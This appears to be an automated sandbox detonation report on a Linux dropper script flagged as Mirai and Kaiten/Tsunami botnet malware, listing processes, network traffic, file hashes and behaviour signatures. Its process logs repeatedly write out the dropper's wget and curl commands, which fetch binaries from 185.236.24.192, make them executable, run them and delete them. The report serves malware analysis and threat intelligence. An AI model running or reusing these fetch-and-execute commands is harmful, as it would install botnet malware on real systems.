[rm -rf /tmp/GoldAge3ATOppc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOsh4]
/tmp/GoldAge3ATOsh4
[/tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOspc]
/tmp/GoldAge3ATOspc
[/tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx64]
/tmp/GoldAge3ATOx64
[/tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx86]
/tmp/GoldAge3ATOx86
[/tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86.1]
/usr/bin/wget
[wget http://185.236.24.192/bash -O /tmp/bash]
/usr/bin/curl
[curl http://185.236.24.192/bash -o /tmp/bash]
/bin/chmod
[chmod +x /tmp/bash]
/tmp/bash
[/tmp/bash]
/bin/rm
[rm -rf /tmp/bash]
/bin/rm
[rm -rf /tmp/bash.1]
Network
| Country | Destination | Domain | Proto |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
Files
/tmp/GoldAge3ATOarm
| MD5 | c37a156e474db5c40f0affd035ee358f |
| SHA1 | 990bc43195246650ee6929c2c40afe7efa14d058 |
| SHA256 | 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876 |
| SHA512 | ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6 |
/tmp/GoldAge3ATOarm5
| MD5 | d8e7f95f2de61c8a75cf9cf7777ba06d |
| SHA1 | 040e5656fed375ef1c7e253822f0edb3f350616b |
| SHA256 | 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db |
| SHA512 | 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8 |
/tmp/GoldAge3ATOarm6
| MD5 | 3c5c66502403c26ffd38c305e0073e56 |
| SHA1 | 584b0a7b269f9e07d3d1ca9880b8710f035e435a |
| SHA256 | f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900 |
| SHA512 | 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89 |
/tmp/GoldAge3ATOarm7
| MD5 | d1bc7e87209a400dfa40307eca08289a |
| SHA1 | b9922e7972f0c46ecbcc18503b37b46299d3eaf9 |
| SHA256 | 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b |
| SHA512 | 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50 |
/tmp/GoldAge3ATOm68k
| MD5 | b9e708d1101756b3452ff33eaaa984f9 |
| SHA1 | f7744930aa85da6dbf7785c91e01e419987ce4e5 |
| SHA256 | 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1 |
| SHA512 | 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa |
/tmp/GoldAge3ATOmips
| MD5 | db3d52d93de2b229748c916d261ca0d5 |
| SHA1 | 29889196802fe35c0e5933991bd7f4a89de56946 |
| SHA256 | 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5 |
| SHA512 | 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652 |
/tmp/GoldAge3ATOmpsl
| MD5 | 2439dbad4a1cb56d7ea54b35aa36251e |
| SHA1 | b9d2099aaab3868094bb20bf556b3b20e8ea5203 |
| SHA256 | 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552 |
| SHA512 | 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25 |
/tmp/GoldAge3ATOppc
| MD5 | 92038a8e6f1123573cf5cd61d21f61ed |
| SHA1 | cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083 |
| SHA256 | a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8 |
| SHA512 | 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567 |
/tmp/GoldAge3ATOsh4
| MD5 | 5eba0470ee235a99e4b34517333a1cd1 |
| SHA1 | 0e417be4cc0769c9480f245941c2f0463147d1fd |
| SHA256 | ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb |
| SHA512 | 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468 |
/tmp/GoldAge3ATOspc
| MD5 | dfcc2c1625e3a1788667a70ca731dedb |
| SHA1 | bdc644788b8599579d8ce88e47270dc67839b226 |
| SHA256 | 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3 |
| SHA512 | 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57 |
/tmp/GoldAge3ATOx64
| MD5 | 399037675ef247197dec6471d9bfbf57 |
| SHA1 | 1fa81b589ee9e8764216b386e4fd5d1d3738bc39 |
| SHA256 | 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298 |
| SHA512 | 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1 |
/tmp/GoldAge3ATOx86
| MD5 | b6fe48263b89bb87446e76bb55170f26 |
| SHA1 | d88d976b1701dafe670a07313f14d3f217855850 |
| SHA256 | 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c |
| SHA512 | 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b |
/tmp/bash
| MD5 | 89ce675ecc4ca2e46f1c412a7074aaf9 |
| SHA1 | cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d |
| SHA256 | c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8 |
| SHA512 | a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-20 17:08
Reported
2025-05-20 17:10
Platform
ubuntu1804-amd64-20250410-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GoldAge3ATOarm | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm5 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm6 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOarm7 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOm68k | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmips | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOmpsl | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOppc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOsh4 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOspc | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx64 | /tmp/x.sh | N/A |
| N/A | /tmp/GoldAge3ATOx86 | /tmp/x.sh | N/A |
| N/A | /tmp/bash | /tmp/x.sh | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/x.sh | N/A |
| File opened for modification | /dev/watchdog | /tmp/GoldAge3ATOx64 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/GoldAge3ATOx64 | N/A |
| File opened for modification | /dev/watchdog | /tmp/x.sh | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 84.162.70.65 | N/A | N/A |
Enumerates active TCP sockets
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/net/tcp | /tmp/x.sh | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | shhssabbbahasbssash | /tmp/GoldAge3ATOx64 | N/A |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/x.sh | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/net/tcp | /tmp/x.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/951/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/408/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/427/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1085/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1498/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/407/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/450/exe | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/681/exe | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1667/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2012/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2100/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1581/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/406/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/955/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1041/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/485/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1337/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/525/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2278/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/446/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1318/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/640/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1060/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1171/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1078/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/434/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1695/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1964/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2165/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1243/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/899/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/667/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/719/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1059/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/681/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/913/exe | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1595/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1594/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1469/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/549/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/568/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1033/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1496/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1583/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1584/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1067/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1118/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/1033/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1151/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1364/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1683/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2022/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2297/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1079/fd | /tmp/GoldAge3ATOx64 | N/A |
| File opened for reading | /proc/404/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1027/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1067/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1923/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/1995/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/2295/exe | /tmp/x.sh | N/A |
| File opened for reading | /proc/410/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/602/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1057/fd | /tmp/x.sh | N/A |
| File opened for reading | /proc/1239/fd | /tmp/x.sh | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/GoldAge3ATOmips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOx64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOx86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOm68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOspc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GoldAge3ATOsh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOarm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/GoldAge3ATOmpsl | /usr/bin/curl | N/A |
Processes
/tmp/x.sh
[/tmp/x.sh]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm]
/tmp/GoldAge3ATOarm
[/tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm5]
/tmp/GoldAge3ATOarm5
[/tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm5.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm6]
/tmp/GoldAge3ATOarm6
[/tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm6.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOarm7]
/tmp/GoldAge3ATOarm7
[/tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7]
/bin/rm
[rm -rf /tmp/GoldAge3ATOarm7.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOm68k]
/tmp/GoldAge3ATOm68k
[/tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k]
/bin/rm
[rm -rf /tmp/GoldAge3ATOm68k.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmips]
/tmp/GoldAge3ATOmips
[/tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmips.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOmpsl]
/tmp/GoldAge3ATOmpsl
[/tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl]
/bin/rm
[rm -rf /tmp/GoldAge3ATOmpsl.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOppc]
/tmp/GoldAge3ATOppc
[/tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOppc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOsh4]
/tmp/GoldAge3ATOsh4
[/tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4]
/bin/rm
[rm -rf /tmp/GoldAge3ATOsh4.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOspc]
/tmp/GoldAge3ATOspc
[/tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc]
/bin/rm
[rm -rf /tmp/GoldAge3ATOspc.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx64]
/tmp/GoldAge3ATOx64
[/tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx64.1]
/usr/bin/wget
[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]
/usr/bin/curl
[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]
/bin/chmod
[chmod +x /tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86]
/bin/rm
[rm -rf /tmp/GoldAge3ATOx86.1]
/usr/bin/wget
[wget http://185.236.24.192/bash -O /tmp/bash]
/usr/bin/curl
[curl http://185.236.24.192/bash -o /tmp/bash]
/bin/chmod
[chmod +x /tmp/bash]
/tmp/bash
[/tmp/bash]
/bin/rm
[rm -rf /tmp/bash]
/bin/rm
[rm -rf /tmp/bash.1]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 3.210.102.181:443 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| GB | 89.187.167.38:443 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:27501 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:27501 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| AU | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| AU | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.42:443 | 1527653184.rsc.cdn77.org | tcp |
| FI | 185.236.24.192:27501 | tcp | |
| FI | 185.236.24.192:27501 | tcp | |
| FI | 185.236.24.192:80 | 185.236.24.192 | tcp |
| FI | 185.236.24.192:14567 | tcp | |
| AU | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| AU | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| AU | 1.1.1.1:53 | local | udp |
| AU | 1.1.1.1:53 | local | udp |
| GB | 185.125.190.96:80 | connectivity-check.ubuntu.com | tcp |
| DE | 84.162.70.65:53 | udp | |
| AU | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| AU | 1.1.1.1:53 | local | udp |
| AU | 1.1.1.1:53 | local | udp |
| US | 91.189.91.98:80 | connectivity-check.ubuntu.com | tcp |
| AU | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| AU | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| AU | 1.1.1.1:53 | local | udp |
| AU | 1.1.1.1:53 | local | udp |
| GB | 185.125.190.18:80 | connectivity-check.ubuntu.com | tcp |
Files
/tmp/GoldAge3ATOarm
| MD5 | c37a156e474db5c40f0affd035ee358f |
| SHA1 | 990bc43195246650ee6929c2c40afe7efa14d058 |
| SHA256 | 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876 |
